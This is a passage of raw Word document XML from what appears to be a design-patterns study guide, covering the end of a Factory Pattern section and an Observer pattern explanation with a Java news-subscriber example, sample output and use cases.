    <w:p w14:paraId="3B79B81B" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1834"/>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Hides object creation logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4798CA63" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1834"/>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Easier to introduce new classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9904FE" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1834"/>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Promotes loose coupling and adherence to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Open/Closed Principle</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4861539F" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494"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Factory Pattern is ideal when a system needs to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delegate the responsibility of object instantiation</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A99F35" w14:textId="25C460E2" w:rsidR="008D0DCC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008D0DC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29E1625">
          <v:rect id="_x0000_i2019" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54990219" w14:textId="64B40F96" w:rsidR="000D56E3" w:rsidRPr="00CE4B95" w:rsidRDefault="002F47F3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="418" w:name="_Toc196307898"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the Observer design pattern</w:t>
      </w:r>
      <w:r w:rsidR="000D56E3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="418"/>
    </w:p>
    <w:p w14:paraId="5205B05A" w14:textId="76302BEE" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Observer Design Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>behavioral pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to define a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one-to-many dependency</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between objects so that when one object (the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Subject</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) changes its state, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all dependent objects (Observers)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are notified and updated automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4B45DC" w14:textId="77777777" w:rsidR="00871B89"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4CA7CEF">
          <v:rect id="_x0000_i2020" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C3E89B" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89"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Key Compon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33"/>
        <w:gridCol w:w="6121"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="48227139" w14:textId="77777777" w:rsidTr="00871B89">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07BF5A6E" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89"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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52FCD273" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="57D42956" w14:textId="77777777" w:rsidTr="00871B89">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C5E83AD"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Subject</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00EE7A3D"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Maintains a list of observers and notifies them of changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="37B8EF30" w14:textId="77777777" w:rsidTr="00871B89">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0142A469"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Observer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74A9F8C1"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Defines an interface to receive updates from the subject</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="757E5D0D" w14:textId="77777777" w:rsidTr="00871B89">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CBCD92E"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ConcreteSubject</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03E4A443"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Actual subject that maintains state and notifies observers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="7B8A1B18" w14:textId="77777777" w:rsidTr="00871B89">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BC4BD34"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ConcreteObserver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="159B2293"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Implements the observer interface and updates itself when notified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C3E62AC" w14:textId="77777777" w:rsidR="00871B89"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27ABE1">
          <v:rect id="_x0000_i2021" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="005C638A" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89"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Real-World Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73634CC4" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1835"/>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YouTube Channel (Subject)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Subscribers (Observers)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the channel uploads a video, all subscribers are notified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4384FEC7" w14:textId="77777777" w:rsidR="00871B89"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7F97C0E">
          <v:rect id="_x0000_i2022" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="602EFF05" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89"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Java Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FA3DC9" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89"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1. Observer Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C20E8C3"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ublic interface Observer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458E6924"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void update(String message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03645DED"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C740A64" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89"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2. Subject Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABF6822"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ublic interface Subject {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0AB6F8"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void attach(Observer o);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321A2109"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void detach(Observer o);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F72210D"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void notifyObservers();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486AADD7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9BDAD6" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89"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3. Concrete Subject:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59271364"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import java.util.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1FC064" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C2486BC"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ublic class NewsAgency implements Subject {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40519BEF"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rivate List&lt;Observer&gt; observers = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D7FE29"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rivate String news;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3E38AC" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6010E6CA"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ublic void setNews(String news) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0372B817"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this.news = news;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D02A0"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notifyObservers();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052A9DC7"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4EF3931D" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="715FA5BC"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    public void attach(Observer o) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D661434"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observers.add(o);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50221948"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4730CBE1" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="360A3FB8"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ublic void detach(Observer o) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423B4C89"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observers.remove(o);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F403AD"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673DF0DE" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E4E5994"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ublic void notifyObservers() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECF4FF1"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for (Observer o : observers) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623AADD6"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o.update(news);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002BCA0E"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2AF3305D"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4E9318E2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2E67B2" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89"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4. Concrete Observer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4D1073"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ublic class NewsSubscriber implements Observer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767CDE1F"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rivate String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F623D01" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66CB1F03"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ublic NewsSubscriber(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19719327"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this.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35270993"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35A70E0A" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D273F7"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ublic void update(String news) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B7BEDE"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System.out.println(name + " received news update: " + news);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C223951"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07FDBD35"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C50597F" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89"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5. Test:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21861C4E"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ublic class Main {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F89489"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ublic static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B670816"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NewsAgency agency = new NewsAgency();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAE164C" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="139A4771"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Observer sub1 = new NewsSubscriber("Subscriber 1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B367C2"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Observer sub2 = new NewsSubscriber("Subscriber 2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA04FAD" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A1D5D4A"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agency.attach(sub1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4390B7A0"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agency.attach(sub2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E14381" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E75F30"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agency.setNews("Breaking: Observer pattern explained!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3B9E8A"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363DCF67"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4A6FE4" w14:textId="77777777" w:rsidR="00871B89"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918EA18">
          <v:rect id="_x0000_i2023" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB376FD" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89"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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E896CF"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Subscriber 1 received news update: Breaking: Observer pattern explained!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EE674D"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Subscriber 2 received news update: Breaking: Observer pattern explained!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FDE897" w14:textId="77777777" w:rsidR="00871B89"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BD97FB9">
          <v:rect id="_x0000_i2024" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D0A6BF" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89"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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C99C893" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1836"/>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Event handling systems (like GUI frameworks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B08B6B" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1836"/>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Notification systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E13D71" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1836"/>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Real-time feeds (stock price updates, news, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FF1363" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89"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Observer pattern is effective when you want </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatic, real-time updates across multiple objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A12154" w14:textId="2A955B6A" w:rsidR="008D0DCC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008D0DC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977F8ED">
          <v:rect id="_x0000_i2025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="421E7A5C" w14:textId="053946CA" w:rsidR="003C003F" w:rsidRPr="00CE4B95" w:rsidRDefault="003C003F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="419" w:name="_Toc196307899"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
